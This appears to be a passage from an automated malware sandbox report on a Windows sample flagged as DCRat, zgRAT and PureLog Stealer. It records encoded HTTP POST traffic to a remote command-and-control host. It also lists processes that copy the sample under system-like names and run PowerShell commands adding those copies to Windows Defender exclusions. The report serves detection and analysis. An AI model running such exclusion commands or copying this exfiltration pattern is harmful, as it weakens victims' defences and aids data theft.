                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:44:09.245074034 CET | 2512 | OUT | Data Raw: 54 56 5b 52 53 5d 59 58 5c 58 5a 51 50 5d 58 51 5b 53 5e 5f 55 54 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TV[RS]YX\XZQP]XQ[S^_UTZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-V1);>!,3",T>:Y#(W'X-*%"Y#*)%&[!"^.
Nov 12, 2024 00:44:09.455274105 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:44:09.537738085 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:09 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                            144 | 192.168.2.4 | 50151 | 37.44.238.250 | 80
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:44:09.672544956 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:44:10.026386976 CET | 2512 | OUT
                                                                                                            Nov 12, 2024 00:44:10.243560076 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:10.323375940 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:10 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                            145 | 192.168.2.4 | 50152 | 37.44.238.250 | 80
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:44:10.391722918 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                            146 | 192.168.2.4 | 50153 | 37.44.238.250 | 80
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:44:10.481868982 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:44:10.838891983 CET | 2504 | OUT
                                                                                                            Nov 12, 2024 00:44:11.048355103 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:11.125822067 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:10 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                            147 | 192.168.2.4 | 50154 | 37.44.238.250 | 80
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:44:11.250150919 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:44:11.604767084 CET | 2512 | OUT
                                                                                                            Nov 12, 2024 00:44:11.815165043 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:11.894896984 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:11 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                            148 | 192.168.2.4 | 50155 | 37.44.238.250 | 80
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:44:12.035393000 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:44:12.385730982 CET | 2512 | OUT
                                                                                                            Nov 12, 2024 00:44:12.605454922 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:12.687433004 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:12 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                            149 | 192.168.2.4 | 50156 | 37.44.238.250 | 80
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:44:12.836967945 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:44:13.182590961 CET | 2512 | OUT
                                                                                                            Nov 12, 2024 00:44:13.436208963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:13.509829044 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:13 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Target ID:0
                                                                                                            Start time:18:41:59
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Users\user\Desktop\s5duotgoYD.exe"
                                                                                                            Imagebase:0xb80000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1674094332.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1812029430.0000000013178000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:18:42:02
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline"
                                                                                                            Imagebase:0x7ff678cc0000
                                                                                                            File size:2'759'232 bytes
                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:18:42:02
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:18:42:02
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9C5.tmp" "c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP"
                                                                                                            Imagebase:0x7ff7a8e00000
                                                                                                            File size:52'744 bytes
                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:22
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:23
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:24
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:25
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:26
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:27
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:28
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:29
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:30
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:31
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:32
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:33
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:34
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                                                                                                            Imagebase:0x630000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            Target ID:35
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                                                                                                            Imagebase:0x580000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:36
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat"
                                                                                                            Imagebase:0x7ff7cc2e0000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:37
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\ModemLogs\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\ModemLogs\conhost.exe
                                                                                                            Imagebase:0x6a0000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\ModemLogs\conhost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\ModemLogs\conhost.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            Target ID:38
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:39
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\ModemLogs\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\ModemLogs\conhost.exe
                                                                                                            Imagebase:0x9e0000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:40
                                                                                                            Start time:18:42:05
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\RuntimeBroker.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Recovery\RuntimeBroker.exe
                                                                                                            Imagebase:0x70000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            Target ID:41
                                                                                                            Start time:18:42:05
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\RuntimeBroker.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Recovery\RuntimeBroker.exe
                                                                                                            Imagebase:0xce0000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:42
                                                                                                            Start time:18:42:05
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:chcp 65001
                                                                                                            Imagebase:0x7ff69e5b0000
                                                                                                            File size:14'848 bytes
                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:43
                                                                                                            Start time:18:42:05
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            Imagebase:0x6b0000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:44
                                                                                                            Start time:18:42:05
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            Imagebase:0xd10000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:45
                                                                                                            Start time:18:42:06
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\xKVBpkhCEjg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Recovery\xKVBpkhCEjg.exe
                                                                                                            Imagebase:0x530000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\xKVBpkhCEjg.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\xKVBpkhCEjg.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            Target ID:46
                                                                                                            Start time:18:42:06
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\w32tm.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                            Imagebase:0x7ff6810f0000
                                                                                                            File size:108'032 bytes
                                                                                                            MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:47
                                                                                                            Start time:18:42:06
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\xKVBpkhCEjg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Recovery\xKVBpkhCEjg.exe
                                                                                                            Imagebase:0xa30000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:48
                                                                                                            Start time:18:42:12
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            Imagebase:0x7ff693ab0000
                                                                                                            File size:496'640 bytes
